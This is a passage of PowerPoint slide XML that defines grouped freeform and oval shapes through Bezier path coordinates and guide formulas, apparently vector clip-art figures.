                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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52" name="Freeform 1783"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2418" y="1435"/>
                  <a:ext cx="267" cy="226"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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53" name="Freeform 1784"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2363" y="1229"/>
                  <a:ext cx="343" cy="269"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
                    <a:gd name="T4" fmla="*/ 173 w 254"/>
                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119"/>
                      </a:cubicBez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54" name="Freeform 1785"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2440" y="1214"/>
                  <a:ext cx="89" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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55" name="Oval 1786"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2429" y="1132"/>
                  <a:ext cx="119" cy="119"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFCC99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5" name="Group 1793"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="6499225" y="2528888"/>
                <a:ext cx="246063" cy="382588"/>
                <a:chOff x="2363" y="1132"/>
                <a:chExt cx="343" cy="529"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="146" name="Freeform 1794"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2474" y="1449"/>
                  <a:ext cx="145" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 108 w 108"/>
                    <a:gd name="T1" fmla="*/ 36 h 140"/>
                    <a:gd name="T2" fmla="*/ 108 w 108"/>
                    <a:gd name="T3" fmla="*/ 35 h 140"/>
                    <a:gd name="T4" fmla="*/ 108 w 108"/>
                    <a:gd name="T5" fmla="*/ 28 h 140"/>
                    <a:gd name="T6" fmla="*/ 108 w 108"/>
                    <a:gd name="T7" fmla="*/ 23 h 140"/>
                    <a:gd name="T8" fmla="*/ 108 w 108"/>
                    <a:gd name="T9" fmla="*/ 22 h 140"/>
                    <a:gd name="T10" fmla="*/ 108 w 108"/>
                    <a:gd name="T11" fmla="*/ 17 h 140"/>
                    <a:gd name="T12" fmla="*/ 108 w 108"/>
                    <a:gd name="T13" fmla="*/ 16 h 140"/>
                    <a:gd name="T14" fmla="*/ 108 w 108"/>
                    <a:gd name="T15" fmla="*/ 16 h 140"/>
                    <a:gd name="T16" fmla="*/ 89 w 108"/>
                    <a:gd name="T17" fmla="*/ 7 h 140"/>
                    <a:gd name="T18" fmla="*/ 64 w 108"/>
                    <a:gd name="T19" fmla="*/ 2 h 140"/>
                    <a:gd name="T20" fmla="*/ 57 w 108"/>
                    <a:gd name="T21" fmla="*/ 4 h 140"/>
                    <a:gd name="T22" fmla="*/ 49 w 108"/>
                    <a:gd name="T23" fmla="*/ 6 h 140"/>
                    <a:gd name="T24" fmla="*/ 49 w 108"/>
                    <a:gd name="T25" fmla="*/ 6 h 140"/>
                    <a:gd name="T26" fmla="*/ 0 w 108"/>
                    <a:gd name="T27" fmla="*/ 18 h 140"/>
                    <a:gd name="T28" fmla="*/ 29 w 108"/>
                    <a:gd name="T29" fmla="*/ 47 h 140"/>
                    <a:gd name="T30" fmla="*/ 62 w 108"/>
                    <a:gd name="T31" fmla="*/ 40 h 140"/>
                    <a:gd name="T32" fmla="*/ 62 w 108"/>
                    <a:gd name="T33" fmla="*/ 118 h 140"/>
                    <a:gd name="T34" fmla="*/ 101 w 108"/>
                    <a:gd name="T35" fmla="*/ 129 h 140"/>
                    <a:gd name="T36" fmla="*/ 108 w 108"/>
                    <a:gd name="T37" fmla="*/ 117 h 140"/>
                    <a:gd name="T38" fmla="*/ 108 w 108"/>
                    <a:gd name="T39" fmla="*/ 36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08" h="140">
                      <a:moveTo>
                        <a:pt x="108" y="36"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="36"/>
                        <a:pt x="108" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="33"/>
                        <a:pt x="108" y="30"/>
                        <a:pt x="108" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="28"/>
                        <a:pt x="108" y="26"/>
                        <a:pt x="108" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="23"/>
                        <a:pt x="108" y="22"/>
                        <a:pt x="108" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="21"/>
                        <a:pt x="108" y="19"/>
                        <a:pt x="108" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="17"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                        <a:pt x="108" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="4"/>
                        <a:pt x="95" y="8"/>
                        <a:pt x="89" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="85" y="6"/>
                        <a:pt x="73" y="0"/>
                        <a:pt x="64" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="60" y="3"/>
                        <a:pt x="57" y="4"/>
                        <a:pt x="57" y="4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29" y="47"/>
                        <a:pt x="29" y="47"/>
                        <a:pt x="29" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                        <a:pt x="62" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="67"/>
                        <a:pt x="62" y="109"/>
                        <a:pt x="62" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="138"/>
                        <a:pt x="89" y="140"/>
                        <a:pt x="101" y="129"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="105" y="126"/>
                        <a:pt x="108" y="122"/>
                        <a:pt x="108" y="117"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="101"/>
                        <a:pt x="107" y="69"/>
                        <a:pt x="108" y="3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47" name="Freeform 1795"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2418" y="1435"/>
                  <a:ext cx="267" cy="226"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 196 w 197"/>
                    <a:gd name="T1" fmla="*/ 44 h 167"/>
                    <a:gd name="T2" fmla="*/ 196 w 197"/>
                    <a:gd name="T3" fmla="*/ 37 h 167"/>
                    <a:gd name="T4" fmla="*/ 177 w 197"/>
                    <a:gd name="T5" fmla="*/ 18 h 167"/>
                    <a:gd name="T6" fmla="*/ 137 w 197"/>
                    <a:gd name="T7" fmla="*/ 25 h 167"/>
                    <a:gd name="T8" fmla="*/ 99 w 197"/>
                    <a:gd name="T9" fmla="*/ 35 h 167"/>
                    <a:gd name="T10" fmla="*/ 99 w 197"/>
                    <a:gd name="T11" fmla="*/ 52 h 167"/>
                    <a:gd name="T12" fmla="*/ 99 w 197"/>
                    <a:gd name="T13" fmla="*/ 35 h 167"/>
                    <a:gd name="T14" fmla="*/ 99 w 197"/>
                    <a:gd name="T15" fmla="*/ 35 h 167"/>
                    <a:gd name="T16" fmla="*/ 99 w 197"/>
                    <a:gd name="T17" fmla="*/ 2 h 167"/>
                    <a:gd name="T18" fmla="*/ 89 w 197"/>
                    <a:gd name="T19" fmla="*/ 14 h 167"/>
                    <a:gd name="T20" fmla="*/ 2 w 197"/>
                    <a:gd name="T21" fmla="*/ 8 h 167"/>
                    <a:gd name="T22" fmla="*/ 2 w 197"/>
                    <a:gd name="T23" fmla="*/ 10 h 167"/>
                    <a:gd name="T24" fmla="*/ 2 w 197"/>
                    <a:gd name="T25" fmla="*/ 31 h 167"/>
                    <a:gd name="T26" fmla="*/ 12 w 197"/>
                    <a:gd name="T27" fmla="*/ 67 h 167"/>
                    <a:gd name="T28" fmla="*/ 70 w 197"/>
                    <a:gd name="T29" fmla="*/ 83 h 167"/>
                    <a:gd name="T30" fmla="*/ 83 w 197"/>
                    <a:gd name="T31" fmla="*/ 82 h 167"/>
                    <a:gd name="T32" fmla="*/ 149 w 197"/>
                    <a:gd name="T33" fmla="*/ 65 h 167"/>
                    <a:gd name="T34" fmla="*/ 150 w 197"/>
                    <a:gd name="T35" fmla="*/ 137 h 167"/>
                    <a:gd name="T36" fmla="*/ 150 w 197"/>
                    <a:gd name="T37" fmla="*/ 141 h 167"/>
                    <a:gd name="T38" fmla="*/ 197 w 197"/>
                    <a:gd name="T39" fmla="*/ 140 h 167"/>
                    <a:gd name="T40" fmla="*/ 196 w 197"/>
                    <a:gd name="T41" fmla="*/ 4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7" h="167">
                      <a:moveTo>
                        <a:pt x="196" y="44"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="44"/>
                        <a:pt x="196" y="40"/>
                        <a:pt x="196" y="37"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="23"/>
                        <a:pt x="183" y="19"/>
                        <a:pt x="177" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="168" y="17"/>
                        <a:pt x="137" y="25"/>
                        <a:pt x="137" y="2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20"/>
                        <a:pt x="99" y="4"/>
                        <a:pt x="99" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="8"/>
                        <a:pt x="95" y="13"/>
                        <a:pt x="89" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="16"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                        <a:pt x="2" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="55"/>
                        <a:pt x="0" y="64"/>
                        <a:pt x="12" y="67"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="69"/>
                        <a:pt x="66" y="82"/>
                        <a:pt x="70" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="73" y="83"/>
                        <a:pt x="78" y="84"/>
                        <a:pt x="83" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="97" y="78"/>
                        <a:pt x="127" y="71"/>
                        <a:pt x="149" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                        <a:pt x="150" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="138"/>
                        <a:pt x="150" y="140"/>
                        <a:pt x="150" y="141"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="167"/>
                        <a:pt x="196" y="163"/>
                        <a:pt x="197" y="140"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="196" y="125"/>
                        <a:pt x="196" y="60"/>
                        <a:pt x="196" y="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48" name="Freeform 1796"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2363" y="1229"/>
                  <a:ext cx="343" cy="269"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 209 w 254"/>
                    <a:gd name="T1" fmla="*/ 119 h 200"/>
                    <a:gd name="T2" fmla="*/ 184 w 254"/>
                    <a:gd name="T3" fmla="*/ 127 h 200"/>
